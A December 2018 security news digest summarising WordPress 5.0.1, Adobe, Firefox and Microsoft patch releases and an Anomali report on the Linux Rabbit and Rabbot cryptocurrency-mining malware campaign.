Latest cyber threats, vulnerabilities, data breaches and security updates
Thursday December 13, 2018:
WordPress 5.0.1 Security Update

WordPress released version 5.0.1 that fixes seven vulnerabilities.


"We strongly encourage you to update your sites immediately," WordPress noted in the security release on Thursday morning. ‚Äč

A summary of the bugs discovered by multiple security researchers and addressed in 5.0.1 include: 
  • Authors could alter meta data to delete files that they weren’t authorized to.
  • Authors could create posts of unauthorized post types with specially crafted input.
  • Contributors could craft meta data in a way that resulted in PHP object injection.
  • Contributors could edit new comments from higher-privileged users, potentially leading to a cross-site scripting vulnerability.
  • Specially crafted URL inputs could lead to a cross-site scripting vulnerability in some circumstances. WordPress itself was not affected, but plugins could be in some situations.
  • The user activation screen could be indexed by search engines in some uncommon configurations, leading to exposure of email addresses, and in some rare cases, default generated passwords.
  • Authors on Apache-hosted sites could upload specifically crafted files that bypass MIME verification, leading to a cross-site scripting vulnerability.

Of note, the WordPress 5.0.1 update now includes support for stronger MIME validation for uploaded files. WordPress versions 5.0 and earlier are affected by the previously listed bugs.

 
Wednesday December 12, 2018:
Adobe fixes vulnerabilities in Acrobat and Reader 

Adobe published security updates to address vulnerabilities in Adobe Acrobat and Reader.

The security update (APSB18-41) addresses 87 vulnerabilities, 38 rated critical. 


Firefox security updates

The Mozilla Foundation issued a security advisory (2018-29) that addresses vulnerabilities in Firefox 64.

Two of the fixes address critical memory safety bugs. Five high and three moderately rates bugs were also addressed in the update. 


 
Tuesday December 11, 2018:
Microsoft December patch updates

Microsoft issued the December 2018 Security Updates that include 39 unique vulnerability fixes, 9 of them rated critical.

The updates address multiple Microsoft products to include, but not limited to: Windows, Edge, Office, Office Services and Web Apps, ChakraCore, .NET Framework, Exchange Server, Microsoft Dynamics NAV, Microsoft Dynamics NAV, Microsoft Visual Studio and Windows Azure Pack (WAP).

According to Microsoft, attackers are exploiting a Windows Kernel Elevation of Privilege Vulnerability (CVE-2018-8611), rated as Important. 

"An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights," Microsoft noted in the advisory. 

Another Windows patch fixes Windows DNS Server Heap Overflow remote code execution (RCE) vulnerability (
CVE-2018-8626that’s currently under active attack, according to Trend Micro. Attackers could exploit this bug and send malicious requests to a Windows DNS server.

Also, a number of workstation related vulnerabilities could be exploited via browsers or opening up malicious files. 

See the Security Update Guide and December summary release notes for more details on all patches.


 
Monday December 10, 2018:
Linux Rabbit and Rabbot Malware threats

Security researchers from Anomali Labs have discovered a new malware dubbed "Linux Rabbit" that has targeted Linux servers and Internet-of-Things (IoT) devices in Russia, South Korea, the UK, and the US. 

The cyber campaign was first spotted in August 2018 and continued through October 2018. According to Anomali Labs, the campaign uses two strains of malware that share the same code base called Linux Rabbit and “Rabbot

The objective of the Linux Rabbit and Rabbot campaign is to install cryptocurrency miners, such as “CNRig” and “CoinHive” Monero, on target devices. 

According to the report, Linux Rabbit malware uses Tor gateway to establish a connection to the Command and Control (C2) server. 

"The malware will randomly select one of the hidden services and then a Tor gateway to follow in order to establish an active C2 URL. The payload for the malware is then sent from the C2 server as an encoded URL parameter," the report noted. 

The malware also establishes persistence on victim's system via “rc.local” files and “.bashrc” files. Once persistence is established, Linux Rabbit attempts to brute force SSH passwords and then install the cryptocurrency miner onto the system. 

An excerpt of the SSH brute force attack threat from the Anomali report: 

 
"The SSH brute forcing begins by the malware first generating a random IPv4 string and checking its geolocation to see where it is located. If the IP is located within a country that is 'blacklisted,' it will stop and move on until it finds an IP that is located in an allowed geolocation, which for this malware are Russia, South Korea, the UK, and the US. Once an allowed IP location is discovered, Linux Rabbit will check to see if an SSH server is listening on Port 22. The malware will open a socket to see if it receives a response, and if it does, it will attempt to obtain the machine’s hostname. Interestingly, this malware will also check the Top-Level Domain (TLD) of a host, and will skip any TLD that is blacklisted. Many of the blacklisted TLDs are government-related sites in a variety of countries. If the TLD is not blacklisted, the malware will run through a process of authentication utilizing a list of hard-coded credentials it has. The first two authentication certifications are to ensure that the malware is not in a 'honey pot'. This is likely to avoid static analysis of the malware."

The report concludes that a new campaign followed from September through October this year that uses a different malware strain to infect systems. The new campaign uses "Rabbot," a self-propagating worm that shares the same code base with Linux Rabbit. 

Rabbot can also infect IoT devices, in addition to Linux systems, by exploiting known vulnerabilities. 

Some of the vulnerabilities Rabbot is known to exploit include: CVE-2018-1149, CVE-2018-9866, CVE-2017-6884, CVE-2016-0792 and CVE-2015-2051.